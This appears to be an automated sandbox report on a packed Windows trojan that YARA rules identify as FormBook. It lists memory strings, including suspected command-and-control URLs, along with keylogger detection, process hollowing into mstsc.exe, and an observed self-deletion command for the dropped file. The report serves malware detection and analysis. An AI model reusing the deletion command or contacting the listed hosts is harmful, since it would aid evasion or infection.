Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.gvanmp.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.gvanmp.com/bsl/
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.gvanmp.com/bsl/www.whatchicken.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.gvanmp.comReferer:
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.infomgt.net
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.infomgt.net/bsl/
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.infomgt.net/bsl/www.renttoowngenius.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.infomgt.netReferer:
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.jokerwirewheels.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a raw input device (often for capturing keystrokes)
Source: WerFault.exe, 0000000A.00000003.731420901.000001EDC784C000.00000004.00000001.sdmp Binary or memory string: GetRawInputData
Yara detected Keylogger Generic
Source: Yara match File source: Process Memory Space: WerFault.exe PID: 7108, type: MEMORY

E-Banking Fraud:

Yara detected FormBook

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_08814EF4 CreateProcessAsUserW, 0_2_08814EF4
Detected potential crypto function
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04770D20 6_2_04770D20
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_048425DD 6_2_048425DD
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04842D07 6_2_04842D07
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0478D5E0 6_2_0478D5E0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04841D55 6_2_04841D55
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047A2581 6_2_047A2581
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04821EB6 6_2_04821EB6
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04796E30 6_2_04796E30
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04842EF7 6_2_04842EF7
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04795600 6_2_04795600
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0483D616 6_2_0483D616
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0484DFCE 6_2_0484DFCE
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04841FF1 6_2_04841FF1
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_048420A8 6_2_048420A8
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0479A830 6_2_0479A830
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_048428EC 6_2_048428EC
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04831002 6_2_04831002
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0484E824 6_2_0484E824
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047A20A0 6_2_047A20A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0478B090 6_2_0478B090
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04794120 6_2_04794120
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0477F900 6_2_0477F900
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047999BF 6_2_047999BF
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_048422AE 6_2_048422AE
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0479B236 6_2_0479B236
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04834AEF 6_2_04834AEF
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0482FA2B 6_2_0482FA2B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0479AB40 6_2_0479AB40
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0483DBD2 6_2_0483DBD2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_048303DA 6_2_048303DA
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_048223E3 6_2_048223E3
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0479A309 6_2_0479A309
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047AABD8 6_2_047AABD8
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_04842B28 6_2_04842B28
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047AEBB0 6_2_047AEBB0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0481CB4F 6_2_0481CB4F
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0479EB9A 6_2_0479EB9A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047A138B 6_2_047A138B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0015E2AF 6_2_0015E2AF
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_00142D90 6_2_00142D90
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_00142D87 6_2_00142D87
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_00149E40 6_2_00149E40
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_0015E772 6_2_0015E772
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_00142FB0 6_2_00142FB0
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: String function: 012BB150 appears 145 times
Source: C:\Windows\SysWOW64\mstsc.exe Code function: String function: 0477B150 appears 145 times
One or more processes crash
Source: unknown Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3424 -s 8832
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSHCore1.dll0 vs SecuriteInfo.com.Trojan.Packed2.42783.14936.exe
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000000.662946839.00000000000CC000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameIMG_4785.exeH vs SecuriteInfo.com.Trojan.Packed2.42783.14936.exe
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687367070.00000000087E0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameRunPe6.dll" vs SecuriteInfo.com.Trojan.Packed2.42783.14936.exe
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.686994540.00000000055B0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs SecuriteInfo.com.Trojan.Packed2.42783.14936.exe
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.686708823.0000000004B70000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs SecuriteInfo.com.Trojan.Packed2.42783.14936.exe
Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1027686906.00000000008F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1027686906.00000000008F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.721240186.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.721240186.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.721927497.0000000001090000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.721927497.0000000001090000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.686008623.0000000003DFA000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.686008623.0000000003DFA000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1025912109.0000000000140000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1025912109.0000000000140000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.686170457.0000000003F66000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.686170457.0000000003F66000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.722073173.00000000010C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.722073173.00000000010C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_7abfb1f1fbdbd7c2322150249348b63f54b8a170_10665708_1ba816b7\Report.wer, type: DROPPED Matched rule: SUSP_WER_Critical_HeapCorruption date = 2019-10-18, author = Florian Roth, description = Detects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation), reference = https://twitter.com/cyb3rops/status/1185459425710092288, score =
Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.evad.winEXE@11/24@5/2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_01
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3424
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: unknown Process created: C:\Windows\explorer.exe
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\explorer.exe File read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Virustotal: Detection: 28%
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe'
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: unknown Process created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
Source: unknown Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3424 -s 8832
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\explorer.exe explorer.exe
Source: unknown Process created: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe 'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: C:\Windows\SysWOW64\mstsc.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{660b90c8-73a9-4b58-8cae-355b7f55341b}\InProcServer32
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: Binary string: Windows.Data.Activities.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: syncreg.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: CapabilityAccessManagerClient.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.Storage.Search.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: authui.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.Internal.Signals.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000A.00000003.747630209.000001EDC50E0000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: AddInProcess32.exe, mstsc.exe
Source: Binary string: HolographicExtensions.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000001.00000000.675621631.0000000000712000.00000002.00020000.sdmp, mstsc.exe, 00000006.00000002.1034631298.0000000004C7F000.00000004.00000001.sdmp
Source: Binary string: LanguageOverlayUtil.pdb}S source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: SLC.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: cscobj.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows.pdblR5 source: WerFault.exe, 0000000A.00000003.746829519.000001EDC4ED0000.00000004.00000001.sdmp
Source: Binary string: SettingMonitor.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: StructuredQuery.pdbYS` source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: werconcpl.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.Internal.Signals.pdbiS0 source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Windows.CloudStore.Schema.Shell.pdb source: WerFault.exe, 0000000A.00000003.747586781.000001EDC805E000.00000004.00000001.sdmp
Source: Binary string: d3d10warp.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: msi.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: Windows.ApplicationModel.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: twinui.pcshell.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: PeopleBand.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: AboveLockAppHost.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: ExecModelProxy.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: grooveex.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: imapi2.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: windows.ui.xaml.pdb6u source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: Windows.StateRepositoryBroker.pdbf source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: srchadmin.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: WindowsCodecs.pdb)Sp source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: ApplicationFrame.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb| source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: wkscli.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: mstsc.pdb source: AddInProcess32.exe, 00000001.00000002.724998329.0000000002D60000.00000040.00000001.sdmp
Source: Binary string: WpnClient.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: NotificationControllerPS.pdbyS source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: shdocvw.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: WINMMBASE.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: twinapi.pdbg source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: TileControl.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: OneCoreCommonProxyStub.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: PlayToDevice.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: TileDataRepository.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.700089831.0000000005A00000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.1048482581.00000000070D0000.00000002.00000001.sdmp
Source: Binary string: msvcp110_win.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: AboveLockAppHost.pdb1SX source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: SndVolSSO.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: winmm.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
Source: Binary string: TaskFlowUI.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: 5.pdb2R source: WerFault.exe, 0000000A.00000002.761878802.000001EDC4EA8000.00000004.00000020.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.UI.Core.TextInput.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: provsvc.pdb source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: Windows.UI.pdb source: WerFault.exe, 0000000A.00000003.747011641.000001EDC8049000.00000004.00000001.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000A.00000003.747192656.000001EDC8044000.00000004.00000001.sdmp
Source: Binary string: AppXDeploymentClient.pdb source: WerFault.exe, 0000000A.00000003.747505561.000001EDC50FE000.00000004.00000001.sdmp
Source: Binary string: dusmapi.pdb%jI source: WerFault.exe, 0000000A.00000003.747163959.000001EDC805F000.00000004.00000001.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000A.00000003.747282578.000001EDC50F8000.00000004.00000040.sdmp
